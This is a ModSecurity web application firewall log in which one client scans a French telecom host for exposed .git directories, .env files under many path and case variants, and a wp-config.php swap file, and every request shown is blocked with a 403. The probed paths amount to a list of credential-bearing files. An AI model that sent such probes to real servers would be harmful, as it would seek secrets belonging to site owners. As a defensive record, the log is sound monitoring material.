[Mon May 11 20:55:58.668311 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects"] [unique_id "agImPvjVc-A-CSptvm1xhAAAAFU"]
[Mon May 11 20:55:58.668480 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects"] [unique_id "agImPvjVc-A-CSptvm1xhAAAAFU"]
[Mon May 11 20:55:58.668666 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects"] [unique_id "agImPvjVc-A-CSptvm1xhAAAAFU"]
[Mon May 11 20:55:58.708625 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/remotes/origin/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agImPteaRXe5lR8y0ZOS3QAAAVM"]
[Mon May 11 20:55:58.708791 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agImPteaRXe5lR8y0ZOS3QAAAVM"]
[Mon May 11 20:55:58.709024 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agImPteaRXe5lR8y0ZOS3QAAAVM"]
[Mon May 11 20:55:58.799915 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ADMIN/.env"] [unique_id "agImPjP5Q_-MBliRCAxnewAAABg"]
[Mon May 11 20:55:58.800115 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ADMIN/.env"] [unique_id "agImPjP5Q_-MBliRCAxnewAAABg"]
[Mon May 11 20:55:58.800325 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ADMIN/.env"] [unique_id "agImPjP5Q_-MBliRCAxnewAAABg"]
[Mon May 11 20:55:58.803591 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/API/.env"] [unique_id "agImPteaRXe5lR8y0ZOS4AAAAVM"]
[Mon May 11 20:55:58.803737 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/API/.env"] [unique_id "agImPteaRXe5lR8y0ZOS4AAAAVM"]
[Mon May 11 20:55:58.803904 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/API/.env"] [unique_id "agImPteaRXe5lR8y0ZOS4AAAAVM"]
[Mon May 11 20:55:58.901194 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/Api/.env"] [unique_id "agImPvjVc-A-CSptvm1xhgAAAFU"]
[Mon May 11 20:55:58.901354 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/Api/.env"] [unique_id "agImPvjVc-A-CSptvm1xhgAAAFU"]
[Mon May 11 20:55:58.901541 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/Api/.env"] [unique_id "agImPvjVc-A-CSptvm1xhgAAAFU"]
[Mon May 11 20:55:58.919039 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/BACK/.env"] [unique_id "agImPlNddpkriGUb6ZV22QAAARg"]
[Mon May 11 20:55:58.919235 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/BACK/.env"] [unique_id "agImPlNddpkriGUb6ZV22QAAARg"]
[Mon May 11 20:55:58.919437 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/BACK/.env"] [unique_id "agImPlNddpkriGUb6ZV22QAAARg"]
[Mon May 11 20:55:58.926191 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/BACKEND/.env"] [unique_id "agImPvjVc-A-CSptvm1xhwAAAFU"]
[Mon May 11 20:55:58.926439 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/BACKEND/.env"] [unique_id "agImPvjVc-A-CSptvm1xhwAAAFU"]
[Mon May 11 20:55:58.926671 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/BACKEND/.env"] [unique_id "agImPvjVc-A-CSptvm1xhwAAAFU"]
[Mon May 11 20:55:58.942125 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /be/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/BE/.env"] [unique_id "agImPlNddpkriGUb6ZV22gAAARg"]
[Mon May 11 20:55:58.942295 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/BE/.env"] [unique_id "agImPlNddpkriGUb6ZV22gAAARg"]
[Mon May 11 20:55:58.942489 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/BE/.env"] [unique_id "agImPlNddpkriGUb6ZV22gAAARg"]
[Mon May 11 20:55:58.974025 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /be/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/Be/.env"] [unique_id "agImPiMeXtzav-mi9SyxqwAAANg"]
[Mon May 11 20:55:58.974267 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/Be/.env"] [unique_id "agImPiMeXtzav-mi9SyxqwAAANg"]
[Mon May 11 20:55:58.974467 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/Be/.env"] [unique_id "agImPiMeXtzav-mi9SyxqwAAANg"]
[Mon May 11 20:55:58.980093 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /.wp-config.php.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.wp-config.php.swp"] [unique_id "agImPiMeXtzav-mi9SyxrAAAAMo"]
[Mon May 11 20:55:58.980287 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.wp-config.php.swp"] [unique_id "agImPiMeXtzav-mi9SyxrAAAAMo"]
[Mon May 11 20:55:58.980695 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.wp-config.php.swp"] [unique_id "agImPiMeXtzav-mi9SyxrAAAAMo"]
[Mon May 11 20:55:59.089732 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/APP/.env"] [unique_id "agImP5Yn-x0CHsbEbP2tzwAAAIo"]
[Mon May 11 20:55:59.090025 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/APP/.env"] [unique_id "agImP5Yn-x0CHsbEbP2tzwAAAIo"]
[Mon May 11 20:55:59.090320 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/APP/.env"] [unique_id "agImP5Yn-x0CHsbEbP2tzwAAAIo"]
[Mon May 11 20:55:59.170055 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/Backend/.env"] [unique_id "agImP1NddpkriGUb6ZV22wAAARg"]
[Mon May 11 20:55:59.170240 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/Backend/.env"] [unique_id "agImP1NddpkriGUb6ZV22wAAARg"]
[Mon May 11 20:55:59.170446 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/Backend/.env"] [unique_id "agImP1NddpkriGUb6ZV22wAAARg"]
[Mon May 11 20:55:59.407774 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin-app/.env"] [unique_id "agImPzP5Q_-MBliRCAxniAAAAAI"]
[Mon May 11 20:55:59.407954 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin-app/.env"] [unique_id "agImPzP5Q_-MBliRCAxniAAAAAI"]
[Mon May 11 20:55:59.408148 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin-app/.env"] [unique_id "agImPzP5Q_-MBliRCAxniAAAAAI"]
